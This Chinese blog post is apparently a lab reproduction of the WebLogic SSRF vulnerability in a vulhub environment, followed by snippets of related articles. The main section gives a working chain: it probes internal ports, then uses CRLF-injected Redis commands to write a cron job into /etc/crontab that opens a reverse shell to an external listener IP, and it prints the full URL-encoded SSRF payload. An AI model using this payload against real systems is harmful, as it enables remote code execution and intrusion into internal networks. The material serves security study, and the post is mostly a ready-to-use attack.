weblogic ssrf 攻击redis

最新推荐文章于 2024-08-16 09:51:58 发布
最新推荐文章于 2024-08-16 09:51:58 发布
阅读量81 收藏 2
点赞数
文章标签: redis 数据库 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qaqCL/article/details/132683902
版权
Weblogic SSRF漏洞
一.环境搭建

app Weblogic path weblogic/ssrf

cd vulhub/weblogic/ssrf

docker-compose up -d

二.SSRF漏洞测试

1.SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp`

2.burp抓包,点击Search进行抓包

在这里插入图片描述

①访问端口不开放则会显示 not connect over

在这里插入图片描述

②访问指定开放端口则返回带有404内容的提示

在这里插入图片描述

3.判断redis服务器

docker exec -it 23e908eaeb17 /bin/bash 进入容器查看 IP IP为172.21.0.2

docker ps 查看docker的ID 通过6379来判断是redis服务器的端口号

(docker环境的网段一般是172.*)

在这里插入图片描述

②探测redis服务器,发现172.21.0.2:6379可以连通

在这里插入图片描述

三.注入HTTP头,利用Redis反弹shell

1.发送三条redis命令,将弹shell脚本写入/etc/crontab

evil处改成反弹shell到kali的IP地址192.168.253.139

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.253.139/21 0>&1'\n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

2.进行url编码

http://172.21.0.2:6379/aaa%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20’sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.253.139%2F21%200%3E%261’%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

4.将修改好的url编码放到operator中,nc 反弹成功,如图

在这里插入图片描述

在这里插入图片描述

JGg-1693874884437)]

[外链图片转存中…(img-VLCle0IL-1693874884437)]

qaqCL
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
WebLogic SSRF漏洞攻击内网Redis以及反弹shell
SoulCat
02-08 3604
WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器,首先判断redis(内网ip和端口),由于Redis是通过换行符来分隔每条命令,可以通过传入%0a%0d来注入换行符,发送redis命令,将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序),然后getshell。 基本...
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6481
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
weblogicssrf漏洞修复_【漏洞复现】利用WebLogic SSRF漏洞攻击内网Redis反弹shell
weixin_39820226的博客
12-22 219
0x01 复现环境公网上存在WebLogic服务,存在SSRF漏洞内网中部署了一台Redis服务器,IP地址为172.21.0.2,端口6379反弹shell需要自己的公网IP总计两个公网IP,一个内网IP0x02 WebLogic SSRF漏洞WebLogicSSRF漏洞算是一个比较知名的SSRF漏洞,具体原理可以自行谷歌。本篇主要是通过复现该漏洞来加深对SSRF漏洞的理解。首先访问WebLo...
ssrf漏洞利用(内网探测、打redis)
Javachichi的博客
02-06 1961
声明该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。滑至文末,获取“searchall”下载链接!
linux weblogic ssrf漏洞,[技术]利用WebLogic SSRF漏洞攻击内网Redis反弹shell
weixin_39742392的博客
05-16 358
0x01 复现环境公网上存在WebLogic服务,存在SSRF漏洞内网中部署了一台Redis服务器,IP地址为172.21.0.2,端口6379反弹shell需要自己的公网IP总计两个公网IP,一个内网IP0x02 WebLogic SSRF漏洞WebLogicSSRF漏洞算是一个比较知名的SSRF漏洞,具体原理可以自行谷歌。本篇主要是通过复现该漏洞来加深对SSRF漏洞的理解。首先访问WebLo...
dedis&weblogic ssrf利用redis未授权反弹shell
Feng_Blue_的博客
10-27 415
本文仅提供于学术探讨,如有后果自行承担。 redis数据库未授权访问漏洞复现 启用漏洞环境 借助工具来进行操作 查看基本帮助 weblogic ssrf利用redis未授权访问反弹shell
SSRF中Redis的利用
2301_80127209的博客
01-23 1330
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
weblogic ssrf-redis 复现
SopRomeo的博客
12-07 524
复现环境 vulhub 感谢vulhub开源,非常方便复现漏洞 漏洞存在点 http://127.0.0.1:7001/uddiexplorer/ burpsuit抓包 发现url请求 分别发送原来的包以及baidu.com的包 发现报错信息返回不同 不能连接80端口,这说明我们是可以访问的 而weblogic是开放7001端口的,访问下7001端口试试 发现回显了404no found,说明可以探测内网端口是否开放 探测内网ip地址 docker环境的网段一般是172.* 根据回显不同,搜内网
WebLogic SSRF 及漏洞修复
11-25
漏洞主要出现在版本10.0.2和10.3.6的`SearchPublicRegistries.jsp`页面中,该页面存在不当的用户输入验证机制,使得攻击者可以通过构造恶意URL来触发SSRF攻击。 **2. 攻击原理** - **构造恶意URL**: 攻击者可以...
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
tomcat-redis实现session共享
03-06
为了解决这个问题,我们可以采用外部存储机制来共享Session,如Redis。本教程将详细讲解如何使用Tomcat与Redis集成,实现Session的共享。 首先,我们需要理解Tomcat和Redis的基本概念。Tomcat是一款开源的Java ...
weblogic 类加载
07-20
WebLogic Server 的类加载机制是 Java 运行时环境中的一个重要组成部分,对于理解和优化应用程序的部署及运行至关重要。本文将详细解析 WebLogic 中的类加载机制及其相关特性。 首先,Java 类加载器是一个核心概念...
Linux环境安装redis
04-03
Linux 环境安装 Redis Linux 环境安装 Redis 是指在 Linux 操作系统中安装和配置 Redis 服务器的过程。Redis 是一个开源的内存数据存储系统,可以用作数据库、消息队列、缓存等多种角色。 安装 Redis đầu ti...
本地访问不到公网redis的解决方法
qq_46896305的博客
08-13 404
连接redis失败
redisredis集群数据节点修改
zerotoall的博客
08-13 636
一、redis集群节点修改    1.添加节点    2.删除节点 #删除没有数据的主节点 [root@db01 ~]# redis-trib.rb del-node 172.16.1.52:6381 a298dbd22c10b8492d9ff4295504c50666f4fb2e >>> Removing node a298dbd22c10b8492d9ff4295504c50666f4fb2e from cluster 172.16.1.52:6381 >>> Sending CLUSTER
redis事件机制
最新发布
笑笑布丁的博客
08-16 484
aeApiAddEvent、aeApiDelEvent:增加或删除一个监听对象。aeEventLoop:redis事件循环器,负责管理事件。aeFileEvent:存储一个文件描述符已注册的文件事件。aeApiPoll:阻塞进程,等待事件就绪或给定事件到期。aeApiCreate:初始化I/O复用机制上下文环境。aeTimeEvent:存储一个时间事件的信息。
Redis 为什么读写性能高?
heromps的博客
08-09 537
Redis 作为一种开源的、基于内存的数据结构存储系统,以其卓越的读写性能而闻名。它被广泛应用于缓存、消息队列、实时数据处理等场景。那么,是什么使得 Redis 拥有如此高的读写性能呢?本文将从以下几个方面进行探讨。
weblogic ssrf
05-17
WebLogic SSRF攻击主要利用WebLogic服务器中的T3协议(Java对象远程调用协议)进行攻击攻击者可以通过构造恶意请求,控制T3协议中的请求内容,使目标服务器将请求发送到攻击者指定的服务器地址,从而实现攻击目的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值